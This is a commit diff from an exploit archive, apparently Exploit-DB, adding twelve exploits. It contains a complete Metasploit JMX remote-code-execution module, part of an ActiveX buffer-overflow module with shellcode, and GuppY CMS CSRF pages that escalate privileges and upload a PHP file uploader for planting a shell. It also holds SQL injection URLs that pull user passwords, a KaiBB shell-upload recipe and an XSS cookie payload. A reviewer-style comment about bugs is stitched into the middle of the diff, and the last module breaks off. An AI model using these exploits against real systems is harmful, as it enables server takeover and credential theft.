Update: 2015-02-19
12 new exploits
parent
6ed35e5963
commit
114a2afb81
13 changed files with 888 additions and 0 deletions
12
files.csv
@ -32530,3 +32530,15 @@ id,file,description,date,author,platform,type,port
36095,platforms/php/webapps/36095.txt,"Serendipity 1.5.1 'research_display.php' SQL Injection Vulnerability",2011-08-31,The_Exploited,php,webapps,0
36096,platforms/php/webapps/36096.txt,"Web Professional 'default.php' SQL Injection Vulnerability",2011-08-31,The_Exploited,php,webapps,0
36097,platforms/php/webapps/36097.txt,"Mambo CMS N-Skyrslur Cross Site Scripting Vulnerability",2011-09-02,CoBRa_21,php,webapps,0
36098,platforms/php/webapps/36098.html,"Guppy CMS 5.0.9 & 5.00.10 Authentication Bypass/Change Email",2015-02-17,"Brandon Murphy",php,webapps,80
36099,platforms/php/webapps/36099.html,"GuppY CMS 5.0.9 & 5.00.10 Multiple CSRF Vulnerabilities",2015-02-17,"Brandon Murphy",php,webapps,80
36100,platforms/windows/remote/36100.rb,"X360 VideoPlayer ActiveX Control Buffer Overflow",2015-02-17,metasploit,windows,remote,0
36101,platforms/java/remote/36101.rb,"Java JMX Server Insecure Configuration Java Code Execution",2015-02-17,metasploit,java,remote,1617
36102,platforms/php/webapps/36102.txt,"Mambo CMS N-Gallery Component SQL Injection Vulnerability",2011-09-02,CoBRa_21,php,webapps,0
36103,platforms/php/webapps/36103.txt,"Mambo CMS AHS Shop Component SQL Injection Vulnerability",2011-09-02,CoBRa_21,php,webapps,0
36106,platforms/php/webapps/36106.txt,"Mambo CMS N-Press Component SQL Injection Vulnerability",2011-09-02,CoBRa_21,php,webapps,0
36107,platforms/php/webapps/36107.txt,"KaiBB 2.0.1 SQL Injection and Arbitrary File Upload Vulnerabilities",2011-09-02,KedAns-Dz,php,webapps,0
36108,platforms/php/webapps/36108.txt,"Mambo CMS N-Frettir Component SQL Injection Vulnerability",2011-09-02,CoBRa_21,php,webapps,0
36109,platforms/php/webapps/36109.txt,"Mambo CMS N-Myndir Component SQL Injection Vulnerability",2011-09-02,CoBRa_21,php,webapps,0
36110,platforms/php/webapps/36110.txt,"ACal 2.2.6 'calendar.php' Cross Site Scripting Vulnerability",2011-09-02,T0xic,php,webapps,0
36111,platforms/windows/remote/36111.py,"Cerberus FTP Server 4.0.9.8 Remote Buffer Overflow Vulnerability",2011-09-05,KedAns-Dz,windows,remote,0
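--- a/platforms/java/remote/36101.rb
+++ b/platforms/java/remote/36101.rb
@@ -0,0 +1,369 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+Rank = ExcellentRanking
+
+include Msf::Java::Jmx
+include Msf::Exploit::Remote::HttpServer
+include Msf::Java::Rmi::Client
+
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Java JMX Server Insecure Configuration Java Code Execution',
+'Description' => %q{
+This module takes advantage a Java JMX interface insecure configuration, which would
+allow loading classes from any remote (HTTP) URL. JMX interfaces with authentication
+disabled (com.sun.management.jmxremote.authenticate=false) should be vulnerable, while
+interfaces with authentication enabled will be vulnerable only if a weak configuration
+is deployed (allowing to use javax.management.loading.MLet, having a security manager
+allowing to load a ClassLoader MBean, etc.).
+},
+'Author' =>
+[
+'Braden Thomas', # Attack vector discovery
+'juan vazquez' # Metasploit module
+],
+'License' => MSF_LICENSE,
+'References' =>
+[
+['URL', 'https://docs.oracle.com/javase/8/docs/technotes/guides/jmx/JMX_1_4_specification.pdf'],
+['URL', 'http://www.accuvant.com/blog/exploiting-jmx-rmi']
+],
+'Platform' => 'java',
+'Arch' => ARCH_JAVA,
+'Privileged' => false,
+'Payload' => { 'BadChars' => '', 'DisableNops' => true },
+'Stance' => Msf::Exploit::Stance::Aggressive,
+'DefaultOptions' =>
+{
+'WfsDelay' => 10
+},
+'Targets' =>
+[
+[ 'Generic (Java Payload)', {} ]
+],
+'DefaultTarget' => 0,
+'DisclosureDate' => 'May 22 2013'
+))
+
+register_options([
+Opt::RPORT(1617)
+], self.class)
+
+end
+
+def on_request_uri(cli, request)
+if request.uri =~ /mlet$/
+jar = "#{rand_text_alpha(8 + rand(8))}.jar"
+
+mlet = "<HTML><mlet code=\"metasploit.JMXPayload\" "
+mlet << "archive=\"#{jar}\" "
+mlet << "name=\"#{@mlet}:name=jmxpayload,id=1\" "
+mlet << "codebase=\"#{get_uri}\"></mlet></HTML>"
+send_response(cli, mlet,
+{
+'Content-Type' => 'application/octet-stream',
+'Pragma' => 'no-cache'
+})
+
+print_status("Replied to request for mlet")
+elsif request.uri =~ /\.jar$/i
+p = regenerate_payload(cli)
+jar = p.encoded_jar
+paths = [
+["metasploit", "JMXPayloadMBean.class"],
+["metasploit", "JMXPayload.class"],
+]
+jar.add_files(paths, [ Msf::Config.data_directory, "java" ])
+
+send_response(cli, jar.pack,
+{
+'Content-Type' => 'application/java-archive',
+'Pragma' => 'no-cache'
+})
+
+print_status("Replied to request for payload JAR")
+end
+end
+
+def check
+connect
+
+unless is_rmi?
+return Exploit::CheckCode::Safe
+end
+
+mbean_server = discover_endpoint
+disconnect
+if mbean_server.nil?
+return Exploit::CheckCode::Safe
+end
+
+connect(true, { 'RPORT' => mbean_server[:address], 'RPORT' => mbean_server[:port] })
+unless is_rmi?
+return Exploit::CheckCode::Unknown
+end
+
+jmx_endpoint = handshake(mbean_server)
+disconnect
+if jmx_endpoint.nil?
+return Exploit::CheckCode::Detected
+end
+
+Exploit::CheckCode::Appears
+end
+
+def exploit
+@mlet = "MLet#{rand_text_alpha(8 + rand(4)).capitalize}"
+connect
+
+print_status("#{peer} - Sending RMI Header...")
+unless is_rmi?
+fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol")
+end
+
+print_status("#{peer} - Discoverig the JMXRMI endpoint...")
+mbean_server = discover_endpoint
+disconnect
+if mbean_server.nil?
+fail_with(Failure::NoTarget, "#{peer} - Failed to discover the JMXRMI endpoint")
+else
+print_good("#{peer} - JMXRMI endpoint on #{mbean_server[:address]}:#{mbean_server[:port]}")
+end
+
+connect(true, { 'RPORT' => mbean_server[:address], 'RPORT' => mbean_server[:port] })
+unless is_rmi?
+fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol with the MBean server")
+end
+
+print_status("#{peer} - Proceeding with handshake...")
+jmx_endpoint = handshake(mbean_server)
+if jmx_endpoint.nil?
+fail_with(Failure::NoTarget, "#{peer} - Failed to handshake with the MBean server")
+else
+print_good("#{peer} - Handshake with JMX MBean server on #{jmx_endpoint[:address]}:#{jmx_endpoint[:port]}")
+end
+
+print_status("#{peer} - Loading payload...")
+unless load_payload(jmx_endpoint)
+fail_with(Failure::Unknown, "#{peer} - Failed to load the payload")
+end
+
+print_status("#{peer} - Executing payload...")
+invoke_run_stream = invoke_stream(
+obj_id: jmx_endpoint[:id].chop,
+object: "#{@mlet}:name=jmxpayload,id=1",
+method: 'run'
+)
+send_call(call_data: invoke_run_stream)
+
+disconnect
+end
+
+def is_rmi?
+send_header
+ack = recv_protocol_ack
+if ack.nil?
+return false
+end
+
+true
+end
+
+def discover_endpoint
+send_call(call_data: discovery_stream)
+return_data = recv_return
+
+if return_data.nil?
+vprint_error("#{peer} - Discovery request didn't answer")
+return nil
+end
+
+answer = extract_object(return_data, 1)
+
+if answer.nil?
+vprint_error("#{peer} - Unexpected JMXRMI discovery answer")
+return nil
+end
+
+case answer
+when 'javax.management.remote.rmi.RMIServerImpl_Stub'
+mbean_server = extract_unicast_ref(StringIO.new(return_data.contents[2].contents))
+else
+vprint_error("#{peer} - JMXRMI discovery returned unexpected object #{answer}")
+return nil
+end
+
+mbean_server
+end
+
+def handshake(mbean)
+vprint_status("#{peer} - Sending handshake / authentication...")
+
+send_call(call_data: handshake_stream(mbean[:id].chop))
+return_data = recv_return
+
+if return_data.nil?
+vprint_error("#{peer} - Failed to send handshake")
+return nil
+end
+
+answer = extract_object(return_data, 1)
+
+if answer.nil?
+vprint_error("#{peer} - Unexpected handshake answer")
+return nil
+end
+
+case answer
+when 'java.lang.SecurityException'
+vprint_error("#{peer} - JMX end point requires authentication, but it failed")
+return nil
+when 'javax.management.remote.rmi.RMIConnectionImpl_Stub'
+vprint_good("#{peer} - Handshake completed, proceeding...")
+conn_stub = extract_unicast_ref(StringIO.new(return_data.contents[2].contents))
+else
+vprint_error("#{peer} - Handshake returned unexpected object #{answer}")
+return nil
+end
+
+conn_stub
+end
+
+def load_payload(conn_stub)
+vprint_status("#{peer} - Getting JMXPayload instance...")
+get_payload_instance = get_object_instance_stream(obj_id: conn_stub[:id].chop , name: "#{@mlet}:name=jmxpayload,id=1")
+send_call(call_data: get_payload_instance)
+return_data = recv_return
+
+if return_data.nil?
+vprint_error("#{peer} - The request to getObjectInstance failed")
+return false
+end
+
+answer = extract_object(return_data, 1)
+
+if answer.nil?
+vprint_error("#{peer} - Unexpected getObjectInstance answer")
+return false
+end
+
+case answer
+when 'javax.management.InstanceNotFoundException'
+vprint_warning("#{peer} - JMXPayload instance not found, trying to load")
+return load_payload_from_url(conn_stub)
+when 'javax.management.ObjectInstance'
+vprint_good("#{peer} - JMXPayload instance found, using it")
+return true
+else
+vprint_error("#{peer} - getObjectInstance returned unexpected object #{answer}")
+return false
+end
+end
+
+def load_payload_from_url(conn_stub)
+vprint_status("Starting service...")
+start_service
+
+vprint_status("#{peer} - Creating javax.management.loading.MLet MBean...")
+create_mbean = create_mbean_stream(obj_id: conn_stub[:id].chop, name: 'javax.management.loading.MLet')
+send_call(call_data: create_mbean)
+return_data = recv_return
+
+if return_data.nil?
+vprint_error("#{peer} - The request to createMBean failed")
+return false
+end
+
+answer = extract_object(return_data, 1)
+
+if answer.nil?
+vprint_error("#{peer} - Unexpected createMBean answer")
+return false
+end
+
+case answer
+when 'javax.management.InstanceAlreadyExistsException'
+vprint_good("#{peer} - javax.management.loading.MLet already exists")
+when 'javax.management.ObjectInstance'
+vprint_good("#{peer} - javax.management.loading.MLet created")
+when 'java.lang.SecurityException'
+vprint_error("#{peer} - The provided user hasn't enough privileges")
+return false
+else
+vprint_error("#{peer} - createMBean returned unexpected object #{answer}")
+return false
+end
+
+vprint_status("#{peer} - Getting javax.management.loading.MLet instance...")
+get_mlet_instance = get_object_instance_stream(obj_id: conn_stub[:id].chop , name: 'DefaultDomain:type=MLet')
+send_call(call_data: get_mlet_instance)
+return_data = recv_return
+
+if return_data.nil?
+vprint_error("#{peer} - The request to getObjectInstance failed")
+return false
+end
+
+answer = extract_object(return_data, 1)
+
+if answer.nil?
+vprint_error("#{peer} - Unexpected getObjectInstance answer")
+return false
+end
+
+case answer
+when 'javax.management.InstanceAlreadyExistsException'
+vprint_good("#{peer} - javax.management.loading.MLet already found")
+when 'javax.management.ObjectInstance'
+vprint_good("#{peer} - javax.management.loading.MLet instance created")
+else
+vprint_error("#{peer} - getObjectInstance returned unexpected object #{answer}")
+return false
+end
+
+vprint_status("#{peer} - Loading MBean Payload with javax.management.loading.MLet#getMBeansFromURL...")
+
+invoke_mlet_get_mbean_from_url = invoke_stream(
+obj_id: conn_stub[:id].chop,
+object: 'DefaultDomain:type=MLet',
+method: 'getMBeansFromURL',
+args: { 'java.lang.String' => "#{get_uri}/mlet" }
+)
+send_call(call_data: invoke_mlet_get_mbean_from_url)
+return_data = recv_return
+
+vprint_status("Stopping service...")
+stop_service
+
+if return_data.nil?
+vprint_error("#{peer} - The call to getMBeansFromURL failed")
+return false
+end
+
+answer = extract_object(return_data, 3)
+
+if answer.nil?
+vprint_error("#{peer} - Unexpected getMBeansFromURL answer")
+return false
+end
+
+case answer
+when 'javax.management.InstanceAlreadyExistsException'
+vprint_good("#{peer} - The remote payload was already loaded... okey, using it!")
+return true
+when 'javax.management.ObjectInstance'
+vprint_good("#{peer} - The remote payload has been loaded!")
+return true
+else
+vprint_error("#{peer} - getMBeansFromURL returned unexpected object #{answer}")
+return false
+end
+end
+
+end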
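Review bot: The options hash handed to `connect(true, ...)` in both `check` and `exploit` repeats the literal key `'RPORT'` (`{ 'RPORT' => mbean_server[:address], 'RPORT' => mbean_server[:port] }`), so the first entry is overwritten and the address returned by `discover_endpoint` is silently discarded; the first key is presumably meant to be `'RHOST'`, and Ruby emits a duplicated-key warning for the literal as written. `check` also returns `Exploit::CheckCode::Safe` from its first `unless is_rmi?` guard without calling `disconnect`, so the socket opened by `connect` on the line above is left open on that path, whereas every later early return disconnects first. The status message in `exploit` has a typo, `Discoverig` → `Discovering`.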
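--- a/platforms/php/webapps/36098.html
+++ b/platforms/php/webapps/36098.html
@@ -0,0 +1,60 @@
+<!--
+Exploit Title: GuppY CMS 5.0.9 & 5.00.10 Authentication bypass/Change email. Other versions may be vulnerable but weren't tested.
+Date: 2/17/2015
+Exploit Author: Brandon Murphy
+Vendor Homepage: http://freeguppy.org
+Software Link: Windows-5.00.10 https://www.freeguppy.org/dwnld.php?lng=en&delay=5&pg=255317&li=CeCILL
+Version: 5.0.9 & 5.00.10
+Tested on: Windows 7/Firefox & Xubuntu Linux 3.2.0-23-generic
+Xubuntu - Guppy CMS 5.00.10 VM: http://mediafire.com/download/d85mgobb35mblzb/GUPPY5.0.7z Working on Virtualbox & VMWare Workstation - VM by d1ch4do
+Username:xubuntu Pass:reverse
+
+Timeline:
+12/21/2014 Notified vendor of vulnerability.
+12/21/2014 Vendor replied requesting information.
+12/22/2014 Vendor notified of another vulnerability. Supplied both exploits/info.
+12/23/2014 Vendor replied problem identified. I was told that I would be supplied with corrections when patch is ready.
+12/23/2014 Acknowledged. Told vendor full disclosure will be released 45 days after patch release.
+12/29/2014 Vendor releases 5.00.10. Countdown begins.
+1/1/2015 Vendor notified the vulnerabilities still exist in patched version 5.00.10
+1/2/2015 Vendor supplied with version 2 exploits.
+2/17/2015 Public Disclosure. Was delayed due to holiday.
+
+Exploit Description:
+This exploit will automatically log you in and change the email to any registered user except for the admin that is installed with the web application.
+Click on "Become a member" on the target website to insert the appropriate cookies for this to work.
+Once the exploit takes place proceed to click "Modify" and change the password. To see if the user has some sort of admin privileges go to site.com/admin/ while still logged in. If they do it will say "Vic_username, enter your password:" and login with the password you just changed it to.
+
+Disclaimer:
+I cannot be held accountable for anything you do with this exploit. You take responsibility for your own actions. For educational and testing purposes only.
+-->
+
+<html>
+<body bgcolor="#000000">
+<font face="arial" color="#01DF01" size="5">
+<center>
+GuppY CMS 5.0.9 & 5.00.10 Authentication bypass/Change email. Other versions may be vulnerable but weren't tested.<br>
+Stable with Firefox 34.0.5. Other browsers may be unstable or may not work.<br><br><br>
+Thanks: Fred, d1ch4do, & to all of the people who don't believe in me.<br>
+<a href="https://linkedin.com/in/brandonm86">My LinkedIn</a><br>-----------------------------------------------------------------------------------</font>
+<body>
+<form action="http://website.com/user.php?lng=en" method="POST"> <!-- Change this action to http://website.com/user.php?lng=en&uuser=new to work with 5.00.10. -->
+<input type="hidden" name="token" value="131095497e5f9d22882.83937400"/> <!-- Click on become a member. View the source then search for "token" and replace this value. Remove this line to work with 5.00.10 -->
+<input type="hidden" name="setusercookie" value="1"/>
+<input type="hidden" name="uuser" value="update"/> <!-- Wet paint. Don't touch! -->
+<input type="hidden" name="code_pseudo" value=""/>
+<input type="text" name="upseudo" value="Vic Username"/><br><br> <!-- User to login as. Can be any registered user with(out) special privileges. -->
+<input type="text" name="uuid" value="Password"/><br><br> <!-- Anything you like as you will change the password to what you want after the exploit succeeds. -->
+<input type="text" name="uuid2" value="Verify Password"/><br><br>
+<input type="text" name="uemail" value="Your Email"/><br><br><br> <!-- Email will be changed to the one you provide. -->
+<input type="hidden" name="uwebsite" value="http://"/>
+<input type="hidden" name="usign" value=""/>
+<input type="hidden" name="uimgsign" value="http://"/>
+<input type="hidden" name="ulang" value="en"/>
+<input type="hidden" name="udesign" value=""/>
+<input type="hidden" name="uboxes" value="LR"/>
+<input type="hidden" name="uextavatar" value="http://"/>
+<input type="submit" value="Enjoy the ride!"/></center>
+</form>
+</body>
+</html>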
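--- a/platforms/php/webapps/36099.html
+++ b/platforms/php/webapps/36099.html
@@ -0,0 +1,80 @@
+<!--
+Exploit Title: GuppY CMS 5.0.9 & 5.00.10 Multiple CSRF Vulnerabilities-Privilege escalation/File upload. Other versions may be vulnerable but weren't tested.
+Date: 2/17/2015
+Exploit Author: Brandon Murphy
+Vendor Homepage: http://freeguppy.org
+Software Link: Windows-5.00.10 https://www.freeguppy.org/dwnld.php?lng=en&delay=5&pg=255317&li=CeCILL
+Version: 5.0.9 & 5.00.10
+Tested on: Windows 7/Firefox & Xubuntu Linux 3.2.0-23-generic
+Xubuntu - Guppy CMS 5.00.10 VM: http://mediafire.com/download/d85mgobb35mblzb/GUPPY5.0.7z Working on Virtualbox & VMWare Workstation - VM by d1ch4do
+Username:xubuntu Pass:reverse
+
+Timeline:
+12/21/2014 Notified vendor of vulnerability.
+12/21/2014 Vendor replied requesting information.
+12/22/2014 Vendor notified of another vulnerability. Supplied both exploits/info.
+12/23/2014 Vendor replied problem identified. I was told that I would be supplied with corrections when patch is ready.
+12/23/2014 Acknowledged. Told vendor full disclosure will be released 45 days after patch release.
+12/29/2014 Vendor releases 5.00.10. Countdown begins.
+1/1/2015 Vendor notified the vulnerabilities still exist in patched version 5.00.10
+1/2/2015 Vendor supplied with version 2 exploits.
+2/17/2015 Public Disclosure. Was delayed due to holiday.
+
+Exploit Description:
+Stable with Firefox 34.0.5. Other browsers may be unstable or may not work. When an authenticated admin is exposed to the code below it will do a couple things. "CSRF 1" allows a registered user to escalate their privileges to Collaborator Admin with access to the "files" plugin. This will allow the attacker to upload a php shell to compromise the server. Once executed the attacker would log into the website as normal then proceed to site.com/admin where it greets them with "AttackerName, enter your password :" and login with the same password you registered with. Hover over "General Management" and then click "Files" where the you can upload a shell of your choosing.
+
+"CSRF 2" As stated earlier the admin has to be authenticated for this to work. However, the attacker doesn't need an account for "CSRF 2" to work. If the attacker does have an account "CSRF 1" and "CSRF 2" are both automatically executed when the page is loaded giving them 2 ways in. All that is needed on the attacker's end is to go to site.com/file/up.php, upload your shell and access it at site.com/file/shell_name.php The admin must have access to the "files" plugin.
+
+Thanks: Fred, d1ch4do, & to all of the people who don't believe in me.
+
+My LinkedIn: https://linkedin.com/in/brandonm86
+
+Disclaimer:
+I cannot be held accountable for anything you do with this exploit. You take responsibility for your own actions. For educational and testing purposes only.
+-->
+
+<!-- CSRF 1 start - Escalate attacker privileges to Collaborator Admin with the ability to upload unrestricted files (A shell). -->
+<html>
+<body onload="document.forms[0].submit(); redirect(); submitRequest()">
+<form action="http://site.com/admin/admin.php?lng=en&pg=attribdroits" method="POST">
+<input type="hidden" name="namedroits" value="TestUser"/> <!-- Attacker user name. You must register this user first! -->
+<input type="hidden" name="etape" value="3"/>
+<input type="hidden" name="drtuser38" value="5f4dcc3b5aa765d61d8327deb882cf99"/> <!-- Attacker password md5 hash. -->
+<input type="hidden" name="drtuser42" value="admin"/> <!-- Your rights to be granted. Leave me alone! -->
+<input type="hidden" name="drtuser30" value=""/>
+<input type="hidden" name="drtuser36" value="on"/>
+<input type="hidden" name="listplug" value="files"/> <!-- The plugin you will grant yourself access to. -->
+</form>
+<script>
+function redirect(){
+window.location.href = "http://site.com/index.php"; <!-- Redirect admin to somewhere else after the CSRF takes place or he/she would know the jig is up. -->
+}
+<!-- End CSRF 1 -->
+<!-- CSRF 2 start - Uploads a small upload script that can then be used to upload your favorite shell. Go to site.com/file/up.php then upload your shell. -->
+function submitRequest()
+{
+var xhr = new XMLHttpRequest();
+xhr.open("POST", "http://site.com/admin/admin.php?lng=en&pg=upload", true);
+xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
+xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------221361792726389");
+xhr.withCredentials = true;
+var body = "-----------------------------221361792726389\r\n" +
+"Content-Disposition: form-data; name=\"rep\"\r\n" +
+"\r\n" +
+"file\r\n" +
+"-----------------------------221361792726389\r\n" +
+"Content-Disposition: form-data; name=\"ficup\"; filename=\"up.php\"\r\n" + <!-- Name your php upload script here. -->
+"Content-Type: application/octet-stream\r\n" +
+"\r\n" +
+"\x3cform method=\"post\" action=\"\" enctype=\"multipart/form-data\"\x3e\x3cinput type=\"file\" name=\"myfile\"\x3e\x3cinput type=\"submit\" value=\"Upload\"\x3e\x3c/form\x3e\x3c?PHP $dir = \"./\"; $path = $_FILES[\"myfile\"][\"tmp_name\"]; $name = $_FILES[\"myfile\"][\"name\"];if (move_uploaded_file($path, $dir . $name)){print \"file uploaded. You made it\";} else {print \"Error! No hacking today!\";} ?\x3e\r\n" +
+"-----------------------------221361792726389--\r\n"; <!-- Upload script by d1ch4do -->
+var aBody = new Uint8Array(body.length);
+for (var i = 0; i < aBody.length; i++)
+aBody[i] = body.charCodeAt(i);
+xhr.send(new Blob([aBody]));
+}
+</script>
+<!-- Ending CSRF -->
+</body>
+</html>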
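--- a/platforms/php/webapps/36102.txt
+++ b/platforms/php/webapps/36102.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/49418/info
+
+The Mambo CMS N-Gallery component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/[PATH]/index.php?option=com_n-gallery&Itemid=-0&flokkur=23 union select 0 from mos_users--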
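--- a/platforms/php/webapps/36103.txt
+++ b/platforms/php/webapps/36103.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/49419/info
+
+The Mambo CMS AHS Shop component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/[PATH]/index.php?option=com_ahsshop&flokkur=-294 union select 0,username,password,3,4,5,6,7,8,9 from mos_users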
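--- a/platforms/php/webapps/36106.txt
+++ b/platforms/php/webapps/36106.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/49420/info
+
+The Mambo CMS N-Press component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/[PATH]/index.php?option=com_n-press&press=10 union select 0,username,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from mos_users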
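--- a/platforms/php/webapps/36107.txt
+++ b/platforms/php/webapps/36107.txt
@@ -0,0 +1,37 @@
+source: http://www.securityfocus.com/bid/49421/info
+
+KaiBB is prone to multiple SQL-injection vulnerabilities and a arbitrary-file-upload vulnerability because it fails to sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+KaiBB 2.0.1 is vulnerable; other versions may also be affected.
+
+<+> 1 / * Multiple SQL Inj3cti0n :
+
+http://127.0.0.1/kaibb/?s=viewtopic&t='
+http://127.0.0.1/kaibb/?s=viewtopic&t=1'
+http://[target]/[path]/?s=viewtopic&t=[SQLi]
+------------------------------------------------
+http://127.0.0.1/kaibb/?s=viewforum&f='
+http://127.0.0.1/kaibb/?s=viewforum&f=1'
+http://[target]/[path]/?s=viewforum&f=[SQLi]
+------------------------------------------------
+http://127.0.0.1/kaibb/?s=profile&user='
+http://127.0.0.1/kaibb/?s=profile&user=2'
+http://[target]/[path]/?s=profile&user=[SQLi]
+------------------------------------------------
+http://127.0.0.1/kaibb/?s=search&mode=search&term=&page='
+http://127.0.0.1/kaibb/?s=search&mode=search&term=&page=1'
+http://[target]/[path]/?s=search&mode=search&term=&page=1'[SQLi]
+------------------------------------------------
+
+<+> 2 / * File|Sh3lL Upload :
+
+http://127.0.0.1/kaibb/?s=ucp&mode=avatar
+
++ After register go t0 :
+http://[target]/[path]/?s=ucp&mode=avatar
++ Upload Sh3ll.php.gif ....
+- Find him on : http://127.0.0.1/kaibb/img/avatars/{UserID}.gif
+fr0m eXample : {UserID} = 2 :
++ http://127.0.0.1/kaibb/img/avatars/2.gif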
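--- a/platforms/php/webapps/36108.txt
+++ b/platforms/php/webapps/36108.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/49422/info
+
+The Mambo CMS N-Frettir component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/[PATH]/index.php?option=com_n-frettir&do=view&Itemid=81&id=-54 union select 0,username,2,password,4,5,6,7,8,9,10 from mos_users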
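--- a/platforms/php/webapps/36109.txt
+++ b/platforms/php/webapps/36109.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/49424/info
+
+The Mambo CMS N-Myndir component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/[PATH]/index.php?option=com_n-myndir&flokkur=-16 union select username from mos_users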
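--- a/platforms/php/webapps/36110.txt
+++ b/platforms/php/webapps/36110.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/49442/info
+
+ACal is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+ACal 2.2.6 is vulnerable; other versions may also be affected.
+
+http://www.example.com/calendar/calendar.php?year=<script>alert(document.cookie)</script>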
143
platforms/windows/remote/36100.rb
Executable file
@ -0,0 +1,143 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::BrowserExploitServer
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "X360 VideoPlayer ActiveX Control Buffer Overflow",
|
||||
'Description' => %q{
|
||||
This module exploits a buffer overflow in the VideoPlayer.ocx ActiveX installed with the
|
||||
X360 Software. By setting an overly long value to 'ConvertFile()',an attacker can overrun
|
||||
a .data buffer to bypass ASLR/DEP and finally execute arbitrary code.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Rh0', # vulnerability discovery and exploit, all the hard work
|
||||
'juan vazquez' # msf module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['EDB', '35948'],
|
||||
['URL', 'https://rh0dev.github.io/blog/2015/fun-with-info-leaks/']
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'DisableNops' => true,
|
||||
'PrependEncoder' => stack_adjust
|
||||
},
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'InitialAutoRunScript' => 'migrate -f'
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
'BrowserRequirements' =>
|
||||
{
|
||||
:source => /script|headers/i,
|
||||
:clsid => "{4B3476C6-185A-4D19-BB09-718B565FA67B}",
|
||||
:os_name => OperatingSystems::Match::WINDOWS,
|
||||
:ua_name => Msf::HttpClients::IE,
|
||||
:ua_ver => '10.0'
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', {} ]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "Jan 30 2015",
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def stack_adjust
|
||||
adjust = "\x64\xa1\x18\x00\x00\x00" # mov eax, fs:[0x18 # get teb
|
||||
adjust << "\x83\xC0\x08" # add eax, byte 8 # get pointer to stacklimit
|
||||
adjust << "\x8b\x20" # mov esp, [eax] # put esp at stacklimit
|
||||
adjust << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset
|
||||
|
||||
adjust
|
||||
end
|
||||
|
||||
def on_request_exploit(cli, request, target_info)
|
||||
print_status("Request: #{request.uri}")
|
||||
|
||||
case request.uri
|
||||
when /exploit.js/
|
||||
print_status("Sending exploit.js...")
|
||||
headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'}
|
||||
send_exploit_html(cli, exploit_template(cli, target_info), headers)
|
||||
when /sprayer.js/
|
||||
print_status("Sending sprayer.js...")
|
||||
headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'}
|
||||
send_exploit_html(cli, sprayer_template(cli, target_info), headers)
|
||||
when /informer.js/
|
||||
print_status("Sending informer.js...")
|
||||
headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'}
|
||||
send_exploit_html(cli, informer_template(cli, target_info), headers)
|
||||
when /rop_builder.js/
|
||||
print_status("Sending rop_builder.js...")
|
||||
headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'}
|
||||
send_exploit_html(cli, rop_builder_template(cli, target_info), headers)
|
||||
else
|
||||
print_status("Sending main.html...")
|
||||
headers = {'Pragma' => 'no-cache', 'Content-Type'=>'text/html'}
|
||||
send_exploit_html(cli, main_template(cli, target_info), headers)
|
||||
end
|
||||
end
|
||||
|
||||
def main_template(cli, target_info)
|
||||
path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'main.html')
|
||||
template = ''
|
||||
